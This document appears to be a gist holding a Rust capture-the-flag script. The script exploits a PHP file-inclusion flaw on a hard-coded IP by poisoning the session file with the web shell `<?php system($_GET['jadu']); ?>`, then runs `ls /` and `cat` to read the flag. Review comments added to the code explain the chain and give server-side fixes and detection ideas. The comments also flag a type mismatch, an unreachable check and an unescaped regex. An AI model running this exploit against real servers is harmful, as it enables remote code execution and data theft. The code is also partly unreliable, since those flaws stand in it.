
@Aviksaikat
Created December 27, 2022 11:43
get flag script in rust
extern crate reqwest;
extern crate regex;
use reqwest::Client;
use regex::Regex;
/// Sends one GET request to the hard-coded target with PHP source text as the value of the
/// `karma` query parameter.
///
/// The response is discarded; only the request itself matters to the caller. Any transport
/// error panics through `unwrap`.
///
/// NOTE(review): the parameter value is sent verbatim, with no percent-encoding. On the
/// defending side this request is easy to spot: a query string carrying a literal `<?php` tag
/// is a strong signal for a WAF rule or an access-log alert.
fn send_payload(client: &Client) {
    let base = "http://44.200.237.73/";
    // Same URL the original built inline: base address followed by the `karma` parameter.
    let request_url = format!("{}?karma=<?php system($_GET['jadu']); ?>", base);
    let outcome = client.get(request_url.as_str()).send();
    outcome.unwrap();
}
/// Builds the query string appended to the target URL.
///
/// * `cookie` - session identifier; it is spliced into the path `/tmp/sess_<cookie>` that is
///   sent as the `karma` parameter.
/// * `cmd` - when present, appended as the `jadu` parameter.
///
/// Both values are interpolated as-is: nothing is percent-encoded or validated here.
///
/// NOTE(review): presumably the target uses `karma` as an include path (the server code is
/// not shown). The fix belongs on the server: a request parameter must never reach
/// `include`/`require`, and session files should live outside any path the application can
/// include.
fn payload(cookie: &str, cmd: Option<&str>) -> String {
    match cmd {
        // Session-file path plus the extra `jadu` parameter.
        Some(command) => format!("?karma=/tmp/sess_{}&jadu={}", cookie, command),
        // Session-file path only.
        None => format!("?karma=/tmp/sess_{}", cookie),
    }
}
// Entry point: drives a fixed sequence of GET requests against the hard-coded host and prints
// the text matched by the `FLAG{...}` pattern in the last response.
//
// Sequence visible in this function:
//   1. plain GET, then read the `PHPSESSID` cookie from the response;
//   2. GET with `karma=/tmp/sess_<cookie>`;
//   3. `send_payload` (PHP source text in `karma`), then GET with `jadu=ls /`;
//   4. `send_payload` again, then GET with `jadu=cat /<file>`.
//
// NOTE(review): this presumably relies on the target writing `karma` into its session file and
// then including a path taken from `karma` -- inferred from the requests only, the server code
// is not shown. Defensive takeaways: never pass a request parameter to include/require, keep
// session storage outside any includable path, and alert on query strings that contain `<?php`
// or a `/tmp/sess_` path.
//
// Every fallible call below ends in `unwrap`, so any network or parse failure panics.
fn main() {
let client = Client::new();
let url = "http://44.200.237.73/";
// First request only serves to obtain a session cookie.
let response = client.get(url).send().unwrap();
let cookie = response.cookies()["PHPSESSID"].value();
// This response is shadowed by the next `let response` and its body is never read.
let response = client.get(format!("{}{}", url, payload(&cookie, None)).as_str()).send().unwrap();
send_payload(&client);
let response = client.get(format!("{}{}", url, payload(&cookie, Some("ls /"))).as_str()).send().unwrap();
// The pattern is a fixed file name; the `.` is unescaped and therefore matches any character.
let file_regex = Regex::new(r"seCretJutsuToKillBorUtoKun.txt").unwrap();
let file = file_regex.find(&response.text().unwrap()).unwrap().as_str();
// NOTE(review): unreachable as written -- the `unwrap` on the line above already panics when
// nothing matches, and a successful match of this pattern is never empty.
if file.is_empty() {
println!("Oops something wrong no output found!!");
return;
}
send_payload(&client);
// NOTE(review): `payload` is declared with `cmd: Option<&str>`, but this call passes
// `Some(format!(..))`, which is an `Option<String>`.
let response = client.get(format!("{}{}", url, payload(&cookie, Some(format!("cat /{}", file)))).as_str()).send().unwrap();
// Keep only the text after the last ':' in the response body.
let msg = response.text().unwrap().split(":").last().unwrap();
println!("{}", msg);
// NOTE(review): the braces are unescaped; confirm the regex crate accepts this pattern,
// since `unwrap` panics if it does not.
let flag_regex = Regex::new(r"FLAG{.*}").unwrap();
let flag = flag_regex.find(&msg).unwrap().as_str();
println!("\nFlag: {}", flag);
}